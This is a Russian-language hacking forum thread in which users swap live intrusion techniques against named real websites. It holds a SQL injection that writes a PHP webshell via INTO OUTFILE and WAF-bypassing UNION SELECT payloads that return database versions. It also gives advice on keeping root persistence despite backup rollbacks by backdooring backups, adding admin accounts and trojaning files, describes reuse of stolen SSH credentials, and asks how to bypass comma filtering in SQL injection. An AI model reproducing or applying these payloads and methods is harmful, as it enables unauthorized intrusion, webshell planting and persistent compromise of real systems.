Вы про одно забыли - файловые права Code: http://press.otherimages.com/search/text/cat:CEL?pag=1&display=1 into outfile "C:\\\\WEB\\\\UBUNTU\\\\OTHERIMAGESPRESS\\\\controller\\\\123.php" lines terminated by "111" http://press.otherimages.com/controller/i.php?inoms=phpinfo%28%29;
Помогите обойти фильтр Code: http://www.mak-unatrac.com/index.php?pg=product_details&product_id=2+UNION+SELECT+1,2,3,4,5,6,7,8,9+--+
_ttp://www.mak-unatrac.com/index.php?pg=product_details&product_id=2%0B/*!12345%75NiON*/%0B/*!12345%73ElECT*/%0B1,version%28%29,3,4,5,6,7,8,9+--+ 5.1.72-cll P.S: Вариант с JOIN'ом))
YaBtr, В твоем варианте нельзя использовать FROM (срабатывает WAF). У winstrool отлично получилось склеить цифры с union. Можно упростить: PHP: 2 /*!12345union*/ select 1,user(),3,4,5,6,7,8,9--
Есть сайт http://site.com Есть шелл на этом сайте и возможность получить root-а Вопрос: как закрепится в системе, если раз в 24 часа происходит откат всех файлов из бекапа? Вариант с подменой архива с бекапом - не вариант. Mysql вертится на другом сервере.
а тебе mysql не нужен для подмены бекапа, ты подменяешь файлы, а не БД, следовательно суёшь шелл в бекап. да и вообще если уже ты рут, то добавь второго админа или тупо выключи откат.
забэкдурь и БД и двиг. http://raz0r.name/obzory/mysql-bekdor-dlya-windows/ для венды от Разора (старье но временами работает) https://rdot.org/forum/showthread.php?t=677 отличный вариант от Типсей
Тут вопрос в том, что вы имеете под "всех". Если вообще все файлы, то тут только атака на сервер с бекапами. Если все-таки не совсем все, то троянить надо то, что не переписывается. Также есть вариант с захватом всех возможных паролей и ключей.
Спасибо, что натолкнул на вариант с паролями - нашёл файлик с доступами Теперь довольно глупый вопрос, на который я не могу найти ответ: 1. Имеется доступ к сайту через форум phpbb. 2. Имеется шелл к данному сайту, залитый через изменение шаблона. Теперь суть проблемы - при бекконекте к сайту для последующей заливки шелла меняется пользователь. Т.е. При редактировании шаблона - есть возможность редактировать все файлы шаблона. Для редактирования этих файлов используется учётная запись на сервере User1 Но в случае, если напрямую из изменённого файла шаблона выполнить whoami (или сделать бекконект и залить файл в одну из доступных папок), то получаем ответ на whoami - User. У которого есть права на чтение всех папок, кроме двух + есть возможность чтения почти всех файлов. Теперь вопрос: Учитывая возможности phpbb (3.0.22) - есть ли возможность загрузить файл так, чтобы владелец этого файла был User1.
Насколько я помню, в пхпбб нет способа отражения текущего юзера. Энивей, тут также возможны несколько вариантов: 1) Наследственные права, когда все файлы в директории получают владельцем владельца директории. 2) Хитросплетения веб-демонов, изоляций и прочих некошерных вещей. 3) Юзер таки один. Это что касается возможных причин. Попробуйте не аплоадить новый файл тем или иным способом, а вписать текст шелла в один из уже имеющихся.
Каким-то непонятным образом нашёл файл text.py в котором были данные для входа для пользователя sara. Доступ оказался доступом по SSH Зашёл и обнаружил проблему - Из под шелла (пользователь user1): cd home ls -la 5 папок с датой за июль А из под SSH (пользователь sara): cd home ls -la 3 папки с датой за июнь Пытался редактировать файл из под sara - всё редактируется, но при заходе из под шелла - никаких изменений не видно. Теперь вопрос - почему так? Почему разные даты и разное количество папок? Вывод id user1: uid=510(user1) gid=500(user) groups=500(user) user: uid=500(user) gid=500(user) groups=500(user) sara: uid=501(sara) gid=501(sara) groups=501(sara),4(adm),10(wheel),500(user)
Есть ли возможность обойти фильтрацию запятой в SQL иньекции? к примеру запрос: script.php?id=22+union+select+1,2,3+--+ Запятые нужны, комментарии /!*,*/ не прокатывают, запятые останавливают SQL запрос. Есть возможность крутить SQL как error-based, но все паблик способы раскрутки опять же требуют наличие запятых. Кто подскажет, буду признателен. Благодарю за внимание.
